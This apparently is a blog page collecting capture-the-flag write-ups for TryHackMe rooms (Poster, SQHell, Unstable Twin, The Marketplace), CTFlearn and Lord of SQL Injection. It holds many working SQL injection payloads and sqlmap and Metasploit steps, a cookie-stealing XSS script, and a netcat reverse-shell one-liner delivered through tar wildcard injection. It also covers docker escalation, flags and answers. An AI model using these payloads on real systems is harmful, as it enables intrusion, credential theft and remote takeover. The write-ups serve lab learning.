Tag: sqlinjection

TryHackMe solution: Poster

Link: https://tryhackme.com/room/poster

#1 “What is the rdbms installed on the server?
#2 “What port is the rdbms running on?

Use nmap to find open ports:

nmap -sCV 10.10.65.155
#3 “After starting Metasploit, search for an associated auxiliary module that allows us to enumerate user credentials. What is the full path of the modules (starting with auxiliary)?

Start Metasploit and use:

search PostgreSQL

The answer is in number 7.

#4 “What are the credentials you found?

Set RHOSTS and run.

#5 “What is the full path of the module that allows you to execute commands with the proper user credentials (starting with auxiliary)?

Start Metasploit and use:

search PostgreSQL

The answer is in number 9.

#6 “Based on the results of #6, what is the rdbms version installed on the server?

Set RHOSTS, PASSWORD and run.

#7 “What is the full path of the module that allows for dumping user hashes (starting with auxiliary)?
search postgres auxiliary hash

The answer is in number 2.

#8 “How many user hashes does the module dump?

Set RHOSTS, PASSWORD and run.

#9 “What is the full path of the module (starting with auxiliary) that allows an authenticated user to view files of their choosing on the server?

Start Metasploit and use:

search PostgreSQL

The answer is in number 8.

#10 “What is the full path of the module that allows arbitrary command execution with the proper user credentials (starting with exploit)?

The answer is in number 4.

#11 “Compromise the machine and locate user.txt

After get shell, read /var/www/html/config.php, we will see a credential of alison here.

Get alison‘s shell:

su - alison
cat /home/alison/user.txt
#12 “Escalate privileges and obtain root.txt

Check what we can do with:

sudo -l

So we can run all as root.

sudo cat /root/root.txt

TryHackMe solution: SQHell

Link: https://tryhackme.com/room/sqhell

#1 “Flag 1

There is a SQL injection vulnerability in the login function, so we can login with:

username:' or 1=1#
password:a
#2 “Flag 2

Read Terms and Conditions:

We try to add Header “X-Forwarded-For” to the request and send it to server. The request looks like:

GET / HTTP/1.1
Host: 10.10.142.249
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
X-Forwarded-For: *

Save the request to a file named r.txt and use sqlmap:

sqlmap -r r.txt --dump --batch
#3 “Flag 3″

Register function does not work, view page source and we see:

There is a function to check if an username existed.

Use sqlmap for to find the flag:

sqlmap -u "http://10.10.174.62/register/user-check?username=a" --dbms=mysql --dump -D sqhell_3 -T flag --batch
#4 “Flag 4″

Request to view information of an user is vulnerable to SQLi:

http://10.10.142.249/user?id=1

Use:

user?id=0 or 1=1--

But there is only one user.

user?id=1 union select null,null,null--

This indicates that there is 3 columns.

When I use:

user?id=0 union select 1,null,null--

The server still return an user, so I think there is another query here.

user?id=0 union select '1 union select null,null,null,null',null,null--

Now we have 4 columns.

Get the flag with:

user?id=0 union select '1 union select null,flag,null,null from flag',null,null--
#5 “Flag 5

We have a hint.

Hint: Unless displayed on the page the flags are stored in the flag table in the flag column.

So we will try a payload:

/post?id=0+union+select+null,flag,null,null+from+flag#

TryHackMe solution: Unstable Twin

Link: https://tryhackme.com/room/unstabletwin

#1 “What is the build number of Vincent’s server?

Use nmap:

nmap -sCV 10.10.109.159

Use dirsearch:

python3 dirsearch.py -u 10.10.128.70

Access: http://10.10.128.70/info

View the response and we can see a header: Build Number

#2 “Is this the only build? (Yay/Nay)

Resend the request to /info and view the header again.

#3 “How many users are there?
#4 “What colour is Vincent?

We will test api login:

http://10.10.128.70/api/login

If we use the wrong credential, we have:

Test for SQL injection:

We get a message:

So the login function is vulnerable to SQL injection. We will know the version of the database with payload:

' union select sqlite_version(),null--

The server returns:

Name all the tables:

' union select name,null from sqlite_master where type='table'--

Name all the columns:

' union select sql,null from sqlite_master where tbl_name='users' and type='table'--

Get all accounts with:

' union select username,password from users --
#5 “What is Mary Ann’s SSH password

Enumerate the database. Get all columns in notes with:

' union select sql,null from sqlite_master where tbl_name='notes' and type='table'--

Get all the notes with:

' union select cast(user_id as text),notes from notes--

And we have Mary Ann’s password:

eaf0651dabef9c7de8a70843030924d335a2a8ff5fd1b13c4cb099e66efe25ecaa607c4b7dd99c43b0c01af669c90fd6a14933422cf984324f645b84427343f4

We can crack the hash with CrackStation.

#6 “User Flag

Connect to ssh:

ssh mary_ann@10.10.128.70

And we have the flag.

#7 “Final Flag

We have a note in server_notes.txt.

So we need to find these images. And I found them in /opt/unstabletwin/.

Read two .py files.

main_5000.py
main_5001.py

So we can get the image when accessing:

http://10.10.128.70/get_image?name=marnie

If we get nothing, refresh the page and we will have the image.

After getting all the images, we can extract them with:

steghide extract -sf marnie.jpeg

Then we have 5 text files. Read mary_ann.txt we have:

You need to find all my children and arrange in a rainbow!

Concat 4 strings in the order of: Red – Orange – Yellow – Green

1DVsdb2uEE0k5HK4GAIZPS0Mby2jomUKLjvQ4OSwjKLNAAeCdl2J8BCRuXVXeVYvs6J6HKpZWPG8pfeHoNG1

This is a base62 string, we can decode it with Base62 Decode Online Tool.

TryHackMe solution: The Marketplace

Link: https://tryhackme.com/room/marketplace

#1 “What is flag 1?

First, we need to register as a new user and then login. View the first listing, there is a reporting feature.

In New listing, we can add new with a description, I think it may be vulnerable to XSS.

I try the payload.

<script>console.log(document.cookie)</script>

And it worked.

So we will create a new listing with the description is a payload.

<script>
var req = new XMLHttpRequest();
req.open('post','/contact/a',true);
req.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
req.send('message='+document.cookie);
</script>

This payload will send cookie of anyone who view the listing to us as a message.

To make sure that the admin will view this listing, we will send a report to them by “Report listing to admins” option.

After reporting, we will receive the admin’s cookie.

Use this cookie to access Administration panel and we get the first flag.

#2 “What is flag 2? (User.txt)

As the admin, we can see the list of user.

Click an user and we access: /admin?user=1

I try:

/admin?user='

And we get an error message.

And this web is also vulnerable to SQLi when using MySQL.

To find the tables in this database, we use:

/admin?user=0+union+select+group_concat(table_name),null,null,null+from+information_schema.tables+where+table_schema=database()#

Find all columns in table users.

/admin?user=0+union+select+group_concat(column_name),null,null,null+from+information_schema.columns+where+table_schema=database()+and+table_name='users'#

Find all information of users.

/admin?user=0+union+select+group_concat(id,':',isAdministrator,':',password,':',username),null,null,null+from+users#

Do the same to the table messages. Find all columns.

/admin?user=0+union+select+group_concat(column_name),null,null,null+from+information_schema.columns+where+table_schema=database()+and+table_name='messages'#

Find all content of this table.

/admin?user=0+union+select+group_concat(id,':',is_read,':',message_content,':',user_from,':',user_to),null,null,null+from+messages#

This is the message from system to jake, so we have the ssh password of user jake.

Try to ssh to this server.

ssh jake@10.10.85.26

And we have the second flag.

#3 “What is flag 3? (Root.txt)

See what jake can run with sudo.

sudo -l

We can run file /opt/backups/backup.sh as michael.

This post guide us how to abusing wildcards for tar.

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your-ip> 1234 >/tmp/f" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1

Stand up a netcat listener on port 1234.

nc -lvnp 1234

Next, we execute

chmod 777 backup.tar
chmod 777 shell.sh
sudo -u michael ./backup.sh

to let michael have permission to run the file, and get michael‘s shell.

Michael is in group docker. Then, we will create a new container mounting the root filesystem.

Use:

python3 -c 'import pty; pty.spawn("/bin/sh")'

to spawning a TTY Shell.

See list of images with:

docker image ls

We will use alpine to create a container.

docker run -v /:/mnt --rm -it alpine sh

-v /:/mnt : mount the root directory of host to /mnt inside the container
--rm : remove the container after the user exits
-it : interactive and assign a tty
alpine : image to use to create container
sh : binary to run when the container starts

And we have the flag in /mnt/root.

Reference: The Marketplace : TryHackMe

CTFlearn solution: Inj3ction Time

In this lab, we will find all tables with payload:

1 union SELECT null,table_name,null,null FROM information_schema.tables--

and we found table “w0w_y0u_f0und_m3“.

Then, we find all columns with payload:

1 union SELECT null,column_name,null,null FROM information_schema.columns--

and we found column “f0und_m3“.

Finally, we use payload:

1 union SELECT null,f0und_m3,null,null FROM w0w_y0u_f0und_m3--

And we find the flag.

Flag: abctf{uni0n_1s_4_gr34t_c0mm4nd}

Solution: Lord of SQL Injection alien

In this lab, the first query take no as a number, but in the second one, no is taken as a string, so we will use a payload like:

?no=1+union+select+char(97)#'+union+select+'a

When the first query is executing, the hash (#) will comment the remaining.

When the second one is executing, the hash is in the string, then it will return the string ‘a’.

Each query executes twice but have different results, so we will create a condition which depends on time.

This expression returns true (1) or false (0) depend on current time:

now()%2=1

We use sleep(1) to make the query to wait for 1 second and change the result of now()%2.

!sleep(1)&&now()%2=1

This will return 0 or 1. Then char(97+(!sleep(1)&&now()%2=1),100,109,105,110) will return ‘admin‘ or ‘bdmin‘.

We will use the payload:

?no=1+union+select+char(97%2b(!sleep(1)%26%26now()%2=1),100,109,105,110)#'+union+select+char(96%2b(!sleep(1)%26%26now()%2=1),100,109,105,110)#

Solution: Lord of SQL Injection zombie

This stage is like ouroboros, but we cannot use Quine because “ace” in “replace” is not allowed. Then, we will use a different way to take what we entered.

The running query is saved at information_schema.processlist table, we will take it from that table with the payload:

?pw='+union+select+substr(info,38,70)+from+information_schema.processlist#

We use substr() function to just take what we entered from the query.

Solution: Lord of SQL Injection ouroboros

In this lab, the payload

?pw='+or+1=1#

does not work. Then, we will use UNION operator:

?pw=' union select 1#

The return value of the query is printed. But we need it to be the same as the value we entered.

Then, we will use Quine SQLi, it is also mentioned in Wikipedia. A Quine takes no input and produces a copy of its own source code as its only output.

By using this technique, we can bypass this expression:

($result['pw'] === $_GET['pw'])

Then, the payload would be:

?pw=' union SELECT REPLACE(REPLACE('" union SELECT REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") AS Quine#',CHAR(34),CHAR(39)),CHAR(36),'" union SELECT REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") AS Quine#') AS Quine#

Solution: Lord of SQL Injection phantom

In this lab, we need to find the value of email with no=1, so we will duplicate it with insert statement.

We can insert multiple rows at once, to test this, we use the payload:

?joinmail=a'),+(2,'14.248.83.2','aa')#

It worked. Then we just need to change 'aa' value into the email. But MySQL does not allow you to directly insert data from one table to itself, we will change the payload a little.

?joinmail=b'),+(3,'14.248.83.2',(select+email+from+(select+email+from+prob_phantom+where+no=1)+as+a))#

Then, we find the email with no=1.

admin_secure_email@rubiya.kr
Design a site like this with WordPress.com
Get started